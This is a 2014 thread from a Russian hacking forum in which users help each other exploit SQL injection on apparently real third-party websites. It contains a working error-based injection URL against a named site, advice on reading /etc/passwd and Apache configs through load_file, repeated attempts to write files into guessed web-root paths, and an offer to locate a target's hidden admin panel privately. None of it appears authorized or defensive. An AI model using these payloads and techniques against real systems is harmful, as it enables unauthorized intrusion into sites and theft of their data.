HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #23531  
Старый 02.06.2014, 03:20
Inoms
Guest
Сообщений: n/a
Провел на форуме:
23349

Репутация: 45
По умолчанию

Здесь нечего крутить, к лимиту допускаются только целые числа, здесь в любом случае нет даже вариантов к раскрутке.
 
Ответить с цитированием

  #23532  
Старый 02.06.2014, 21:58
sav77
Guest
Сообщений: n/a
Провел на форуме:
20730

Репутация: 0
По умолчанию

Помогите, как начинаю раскручивать - перекидывает на localhost...

Цитата:
Сообщение от None  
cyberfight[antigoogle]ru/site/demos/search/?page=2
 
Ответить с цитированием

  #23533  
Старый 02.06.2014, 23:56
Inoms
Guest
Сообщений: n/a
Провел на форуме:
23349

Репутация: 45
По умолчанию

А что вы там крутите то ? Тут так-же, как с предыдущим сайтом.

Там есть более доступные варианты:

Код:
Code:
http://cyberfight.ru/site/polls/?topic_id=430&answer_id=(select max(0)from information_schema.schemata group by concat(0x427920496E6F6D7321,0x3b,user(),hex(rand(0))))
 
Ответить с цитированием

  #23534  
Старый 03.06.2014, 03:46
Aniweste
Новичок
Регистрация: 28.05.2010
Сообщений: 0
Провел на форуме:
5422

Репутация: 0
По умолчанию

Вопрос, наверное, тупой и т.д., но всё-таки:

При выводе через SQL-injection данных из information_schema.schemata schema_name мы получим базы данных к которым имеет доступ данный пользователь? Или вообще ко всем базам данных?

Соответственно, если ответом на мой вопрос является - ко всем базам данных, к которым имеет доступ пользователь, то у меня второй вопрос:

Если среди этих баз есть mysql, то можно ли узнать file_priv через mysql.user (спрашиваю, т.к. в моём случае выбивает ошибку)? Т.е. через information_schema.schemata schema_name получили данные из base1, information_shema и mysql , но прочитать можем только первые 2. Вот
 
Ответить с цитированием

  #23535  
Старый 03.06.2014, 08:11
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Aniweste  
Aniweste said:
Вопрос, наверное, тупой и т.д., но всё-таки:
При выводе через SQL-injection данных из
information_schema.schemata schema_name
мы получим базы данных к которым имеет доступ данный пользователь? Или вообще ко всем базам данных?
Соответственно, если ответом на мой вопрос является - ко всем базам данных, к которым имеет доступ пользователь, то у меня второй вопрос:
Если среди этих баз есть mysql, то можно ли узнать file_priv через mysql.user (спрашиваю, т.к. в моём случае выбивает ошибку)?
Т.е. через
information_schema.schemata schema_name
получили данные из base1, information_shema и mysql , но прочитать можем только первые 2. Вот
Если в information_schema фигурирует mysql, но чтение с неё не производит - доступ к данной бд урезан для текущего пользователя, попросту говоря, запрещён.

Соответственно, чтобы прочитать колонки с этой БД, тебе нужны права на выборку (селекцию). Если прав нет - чтение произвести ты не сможешь.
 
Ответить с цитированием

  #23536  
Старый 03.06.2014, 08:25
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

Aniweste, Все права можно посмотреть в information_schema.TABLE_PRIVILEGES, information_schema.COLUMN_PRIVILEGES, information_schema.SCHEMA_PRIVILEGES и information_schema.USER_PRIVILEGES.
 
Ответить с цитированием

  #23537  
Старый 03.06.2014, 15:18
Aniweste
Новичок
Регистрация: 28.05.2010
Сообщений: 0
Провел на форуме:
5422

Репутация: 0
По умолчанию

BigBear, XAMEHA - спасибо за ответы
 
Ответить с цитированием

  #23538  
Старый 04.06.2014, 04:07
Aniweste
Новичок
Регистрация: 28.05.2010
Сообщений: 0
Провел на форуме:
5422

Репутация: 0
По умолчанию

Ещё один вопрос.

Сайт - site.com

File_priv - Y

Вывод /etc/passwd под пользователя user() web - /home/web

Вывод /etc/httpd/conf/httpd.conf - DocumentRoot "/var/www/html"

Проверка заливки в '/tmp/test.txt' и вывод через load_file('tmp/test.txt')- 1,2,3,4,5,6,7,8,9,10,12

Пытался заливать в:

Код:
Code:
/home/www/data/www/1.txt
/home/www/data/1.txt
/home/www/data/www/site.com/1.txt
/home/www/data/www/site/1.txt
/home/www/1.txt
/home/www/sites/site.com/htdocs/1.txt
/home/www/sites/sitecom/htdocs/1.txt
/home/www/sites/site/htdocs/1.txt
/home/www/sites/site.com/httpdocs/1.txt
/home/www/sites/sitecom/httpdocs/1.txt
/home/www/sites/site/httpdocs/1.txt
/home/www/sites/sitecom/httdocs/1.txt
/home/www/site/site.com/htdocs/1.txt
/home/www/site/sitecom/htdocs/1.txt
/home/www/site/site/htdocs/1.txt
/home/www/site/site.com/httpdocs/1.txt
/home/www/site/sitecom/httpdocs/1.txt
/home/www/site/site/httpdocs/1.txt
/home/www/site/sitecom/httdocs/1.txt
/home/web/data/www/1.txt/1.txt
/home/web/data/1.txt
/home/web/data/www/site.com/1.txt
/home/web/data/www/site/1.txt
/home/web/1.txt
/home/web/sites/site.com/htdocs/1.txt
/home/web/sites/sitecom/htdocs/1.txt
/home/web/sites/site/htdocs/1.txt
/home/web/sites/site.com/httpdocs/1.txt
/home/web/sites/sitecom/httpdocs/1.txt
/home/web/sites/site/httpdocs/1.txt
/home/web/sites/sitecom/httdocs/1.txt
/home/web/site/site.com/htdocs/1.txt
/home/web/site/sitecom/htdocs/1.txt
/home/web/site/site/htdocs/1.txt
/home/web/site/site.com/httpdocs/1.txt
/home/web/site/sitecom/httpdocs/1.txt
/home/web/site/site/httpdocs/1.txt
/home/web/site/sitecom/httdocs/1.txt
/var/www/html/1.txt
/var/www/web/1.txt
/var/www/html/web/1.txt
/var/www/html/site.com/1.txt
/var/www/html/sitecom/1.txt
/var/www/html/site/1.txt
/var/www/html/web/site.com/1.txt
/var/www/html/web/sitecom/1.txt
/var/www/html/web/site/1.txt
/var/www/web/data/www/site/1.txt
/var/www/web/data/www/site.com/1.txt
/var/www/web/data/www/sitecom/1.txt
На результате это никак не сказалось. По сайту site.com/1.txt - 404 not found

Пытался также перезаписать robots.txt - 404 not found

И т.к. вывода с путём сайта я не нашёл ни так (при неверном запросе /var/wwwwwww/1.txt нету Errcode), не через google (искал вывод ошибки с этого сайта с раскрытием путей), а также пробовал через все вышеперечисленные варианты прочесть корневой robots.txt (через load_file), но как итог - нет результата. у меня 2 вопроса:

1. Возможно ли, что запись в корень не возможна и соответственно невозможно чтение из корня или же я просто не попал на правильные пути?

2. Второй вопрос вытекает из всего вышеперечисленного! Как ещё можно узнать полный путь до корня?

P.s. вопрос с админкой отпадает - она переименована и её найти не смог. Как и директорию с phpmyadmin.
 
Ответить с цитированием

  #23539  
Старый 04.06.2014, 08:21
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Aniweste  
Aniweste said:
Пытался заливать в:
Код:
Code:
/home/www/data/www/1.txt
/home/www/data/1.txt
/home/www/data/www/site.com/1.txt
/home/www/data/www/site/1.txt
/home/www/1.txt
/home/www/sites/site.com/htdocs/1.txt
/home/www/sites/sitecom/htdocs/1.txt
/home/www/sites/site/htdocs/1.txt
/home/www/sites/site.com/httpdocs/1.txt
/home/www/sites/sitecom/httpdocs/1.txt
/home/www/sites/site/httpdocs/1.txt
/home/www/sites/sitecom/httdocs/1.txt
/home/www/site/site.com/htdocs/1.txt
/home/www/site/sitecom/htdocs/1.txt
/home/www/site/site/htdocs/1.txt
/home/www/site/site.com/httpdocs/1.txt
/home/www/site/sitecom/httpdocs/1.txt
/home/www/site/site/httpdocs/1.txt
/home/www/site/sitecom/httdocs/1.txt
/home/web/data/www/1.txt/1.txt
/home/web/data/1.txt
/home/web/data/www/site.com/1.txt
/home/web/data/www/site/1.txt
/home/web/1.txt
/home/web/sites/site.com/htdocs/1.txt
/home/web/sites/sitecom/htdocs/1.txt
/home/web/sites/site/htdocs/1.txt
/home/web/sites/site.com/httpdocs/1.txt
/home/web/sites/sitecom/httpdocs/1.txt
/home/web/sites/site/httpdocs/1.txt
/home/web/sites/sitecom/httdocs/1.txt
/home/web/site/site.com/htdocs/1.txt
/home/web/site/sitecom/htdocs/1.txt
/home/web/site/site/htdocs/1.txt
/home/web/site/site.com/httpdocs/1.txt
/home/web/site/sitecom/httpdocs/1.txt
/home/web/site/site/httpdocs/1.txt
/home/web/site/sitecom/httdocs/1.txt
/var/www/web/data/www/site/1.txt
/var/www/web/data/www/site.com/1.txt
/var/www/web/data/www/sitecom/1.txt
Просто интересно, нахрена, если

Цитата:
Сообщение от None  
DocumentRoot "/var/www/html"
Но ты обязательно продолжай и держи нас в курсе событий !! Есть ещё много интересных директорий !

Ответы:

1) Возможно. Правильный путь проверяется load_file любого существующего файла.

2) Напоролся не на тот конфиг Apache, вариант - старый конфиг.
 
Ответить с цитированием

  #23540  
Старый 04.06.2014, 08:47
Unknown
Guest
Сообщений: n/a
Провел на форуме:
114076

Репутация: 54
По умолчанию

Цитата:
Сообщение от Aniweste  
Aniweste said:
Ещё один вопрос.
Сайт
- site.com
File_priv
-
Y
Вывод /etc/passwd под пользователя user()
web -
/home/web
Вывод /etc/httpd/conf/httpd.conf
-
DocumentRoot "/var/www/html"
Проверка заливки в '/tmp/test.txt' и вывод через load_file('tmp/test.txt')
-
1,2,3,4,5,6,7,8,9,10,12
Пытался заливать в:
Код:
Code:
/home/www/data/www/1.txt
/home/www/data/1.txt
/home/www/data/www/site.com/1.txt
/home/www/data/www/site/1.txt
/home/www/1.txt
/home/www/sites/site.com/htdocs/1.txt
/home/www/sites/sitecom/htdocs/1.txt
/home/www/sites/site/htdocs/1.txt
/home/www/sites/site.com/httpdocs/1.txt
/home/www/sites/sitecom/httpdocs/1.txt
/home/www/sites/site/httpdocs/1.txt
/home/www/sites/sitecom/httdocs/1.txt
/home/www/site/site.com/htdocs/1.txt
/home/www/site/sitecom/htdocs/1.txt
/home/www/site/site/htdocs/1.txt
/home/www/site/site.com/httpdocs/1.txt
/home/www/site/sitecom/httpdocs/1.txt
/home/www/site/site/httpdocs/1.txt
/home/www/site/sitecom/httdocs/1.txt
/home/web/data/www/1.txt/1.txt
/home/web/data/1.txt
/home/web/data/www/site.com/1.txt
/home/web/data/www/site/1.txt
/home/web/1.txt
/home/web/sites/site.com/htdocs/1.txt
/home/web/sites/sitecom/htdocs/1.txt
/home/web/sites/site/htdocs/1.txt
/home/web/sites/site.com/httpdocs/1.txt
/home/web/sites/sitecom/httpdocs/1.txt
/home/web/sites/site/httpdocs/1.txt
/home/web/sites/sitecom/httdocs/1.txt
/home/web/site/site.com/htdocs/1.txt
/home/web/site/sitecom/htdocs/1.txt
/home/web/site/site/htdocs/1.txt
/home/web/site/site.com/httpdocs/1.txt
/home/web/site/sitecom/httpdocs/1.txt
/home/web/site/site/httpdocs/1.txt
/home/web/site/sitecom/httdocs/1.txt
/var/www/html/1.txt
/var/www/web/1.txt
/var/www/html/web/1.txt
/var/www/html/site.com/1.txt
/var/www/html/sitecom/1.txt
/var/www/html/site/1.txt
/var/www/html/web/site.com/1.txt
/var/www/html/web/sitecom/1.txt
/var/www/html/web/site/1.txt
/var/www/web/data/www/site/1.txt
/var/www/web/data/www/site.com/1.txt
/var/www/web/data/www/sitecom/1.txt
На результате это никак не сказалось. По сайту site.com/1.txt -
404 not found
Пытался также перезаписать robots.txt -
404 not found
И т.к. вывода с путём сайта я не нашёл ни так (при неверном запросе /var/wwwwwww/1.txt нету Errcode), не через google (искал вывод ошибки с этого сайта с раскрытием путей), а также пробовал через все вышеперечисленные варианты прочесть корневой robots.txt (через load_file), но как итог - нет результата. у меня 2 вопроса:
1.
Возможно ли, что запись в корень не возможна и соответственно невозможно чтение из корня или же я просто не попал на правильные пути?
2.
Второй вопрос вытекает из всего вышеперечисленного! Как ещё можно узнать полный путь до корня?
P.s. вопрос с админкой отпадает - она переименована и её найти не смог. Как и директорию с phpmyadmin.
Полный путь до корня можно узнать из конфига. Это не обязательно /etc/httpd/conf/httpd.conf. Этот конфиг как правило правят руками, на всяких шаредах разведен бардак в подключаемых конфигах. Аналогично, это зависит от демона. А также phpinfo и любой вывод ошибок. Скиньте вашу ссылочку в пм, поищем админку.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT.XYZ